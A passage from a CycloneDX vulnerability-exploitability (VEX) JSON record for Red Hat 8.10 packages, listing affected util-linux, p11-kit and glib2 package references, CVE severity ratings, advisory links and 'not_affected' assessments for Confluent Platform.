          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-13757",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        674
      ],
      "description": "A flaw was found in p11-kit. The RPC message attribute parsing functions p11_rpc_message_get_attribute() and p11_rpc_message_get_attribute_array_value() form a mutually-recursive call chain with no recursion depth limit when processing nested CKA_WRAP_TEMPLATE, CKA_UNWRAP_TEMPLATE, and CKA_DERIVE_TEMPLATE attributes. An unauthenticated attacker with local access to the p11-kit RPC Unix domain socket can send a specially crafted request with deeply nested template attributes, causing stack exhaustion and crashing the p11-kit server process and its dependent services.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-13757"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:37469"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:38342"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:49667"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:49668"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:53371"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54387"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54760"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-13757"
        },
        {
          "url": "https://bugzilla.redhat.com/2494556"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2494556"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-13757"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-49668.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:49667"
        },
        {
          "url": "https://github.com/advisories/GHSA-p2wm-69qx-x25w"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-13757.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-49668.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-13757"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-13757"
        }
      ],
      "published": "2026-06-29T19:16:40+00:00",
      "updated": "2026-08-13T21:17:40+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.23.22-2.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.23.22-2.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-1484",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "bottlerocket"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        787
      ],
      "description": "A flaw was found in the GLib Base64 encoding routine when processing very large input data. Due to incorrect use of integer types during length calculation, the library may miscalculate buffer boundaries. This can cause memory writes outside the allocated buffer. Applications that process untrusted or extremely large Base64 input using GLib may crash or behave unpredictably.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-1484"
        },
        {
          "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1484"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-1484"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433259"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-253495.html"
        },
        {
          "url": "https://github.com/bottlerocket-os/bottlerocket-core-kit/blob/develop/advisories/14.5.0/BRSA-quby27cpefwz.toml"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3870"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1484"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8017-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-1484"
        }
      ],
      "published": "2026-01-27T14:15:56+00:00",
      "updated": "2026-06-17T10:15:52+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
